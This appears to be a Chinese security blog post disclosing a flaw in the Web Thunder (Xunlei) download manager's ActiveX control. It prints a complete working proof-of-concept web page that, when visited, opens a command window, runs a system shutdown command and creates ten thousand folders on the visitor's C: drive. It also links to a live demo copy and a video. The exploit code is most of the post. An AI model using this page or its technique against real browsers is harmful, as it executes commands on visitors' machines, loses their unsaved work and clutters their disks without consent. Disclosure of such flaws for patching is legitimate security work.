web迅雷允许执行任意系统命令漏洞

by kxlzx

这篇文章很早前发出来,后来因为种种原因和谐了,现在过了这个长时间了。

最近乌云居然有人把某个东西搞了出来,“内部交流”果然不靠谱啊。

所以只好再次把某个东西搞出来,但是没想到某个东西居然依赖这篇文章,所以索性都扔出来吧。

 

描述:

web迅雷空间提供了几个函数,可以在js中直接调用,有些比较有意思的作用,比如

server.OpenDirectory("cmd");

server.CreatePathTree("c:\\hacked by kxlzx");

不是溢出,是迅雷自己提供的函数。

未命名.gif

帮他们广告下:

没装迅雷的请到这里

http://dl.xunlei.com/wxl.html

下载安装。

demo地址:

http://www.inbreak.net/kxlzxtest/xunlei/kxlzx1.htm

录像地址:

http://www.inbreak.net/kxlzxtest/xunlei/xunlei.zip

代码:

  1. <html> 
  2. <head> 
  3. <title>迅雷执行任意系统命令</title> 
  4. </head> 
  5. <body> 
  6. 运行迅雷加载项。 
  7. <script> 
  8. /** 
  9. *by kxlzx 
  10. */ 
  11. server = new ActiveXObject("ThunderServer.WebThunder.1"); 
  12. if(server==null) 
  13.     alert("没装迅雷,请安装web迅雷"); 
  14.     window.location.href="http://dl.xunlei.com/wxl.html"
  15. }else{ 
  16.     server.OpenDirectory("cmd"); 
  17.     alert("要我帮你关机么?"); 
  18.     alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?"); 
  19.     server.OpenDirectory("tsshutdn"); 
  20.     //创建无数文件夹 
  21.     j = 10000
  22.     for(i=0;i<j;i++){ 
  23.         server.CreatePathTree("c:\\hacked by kxlzx "+i); 
  24.     } 
  25.     setTimeout("alert('还愣着?赶快保存啊!')",50000); 
  26. </script> 
  27. </body> 
  28. </html> 

嗯。。。没看完文章先看demo的人后果自负。。。

打开页面后,先弹cmd黑框吓唬一下。

之后在c盘创建1W个文件夹。

j = 10000;
    for(i=0;i<j;i++){打开的人后果自负}

在进行了友情提示后,逐渐关机-_-!

windows7下需要先打开web迅雷页面,之后再访问。原因查找中。。。感谢cnben友情测试。

XP下可安装web迅雷后,直接打开。

发表评论?

3 条评论。

  1. 这个洞洞还真够漏的。。。。。。呵呵

  2. 第二次来这个博客了,
    文章不错,留个足迹。
    希望能回访一下,呵呵。

发表评论